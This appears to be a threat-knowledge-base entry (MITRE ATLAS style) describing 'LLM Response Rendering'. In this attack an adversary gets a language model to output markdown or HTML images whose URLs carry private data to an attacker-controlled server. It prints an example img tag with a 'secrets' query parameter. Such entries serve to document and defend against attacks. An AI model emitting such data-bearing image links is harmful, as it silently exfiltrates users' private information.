LLM Response Rendering
This technique has been demonstrated in research or controlled environments.
An adversary may get a large language model (LLM) to respond with private information that is hidden from the user when the response is rendered by the user's client. The private information is then exfiltrated. This can take the form of rendered images, which automatically make a request to an adversary controlled server.
The adversary gets AI to present an image to the user, which is rendered by the user's client application with no user clicks required. The image is hosted on an attacker-controlled website, allowing the adversary to exfiltrate data through image request parameters. Variants include HTML tags and markdown
For example, an LLM may produce the following markdown: ```  ```
Which is rendered by the client as: ``` <img src="https://atlas.mitre.org/image.png?secrets="private data"> ```
When the request is received by the adversary's server hosting the requested image, they receive the contents of the `secrets` query parameter.